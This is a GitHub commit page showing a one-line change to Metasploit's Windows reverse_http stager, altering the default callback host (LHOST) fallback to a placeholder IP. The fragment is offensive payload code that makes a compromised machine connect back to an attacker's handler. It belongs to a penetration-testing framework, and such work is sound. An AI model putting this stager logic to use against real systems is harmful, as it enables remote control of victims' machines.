We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d0324e8 commit c676ac1Copy full SHA for c676ac1
modules/payloads/stagers/windows/reverse_http.rb
@@ -74,7 +74,7 @@ def generate
74
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
75
p[i, u.length] = u
76
77
- lhost = datastore['LHOST'] || Rex::Socket.source_address
+ lhost = datastore['LHOST'] || '127.127.127.127'
78
if Rex::Socket.is_ipv6?(lhost)
79
lhost = "[#{lhost}]"
80
end
0 commit comments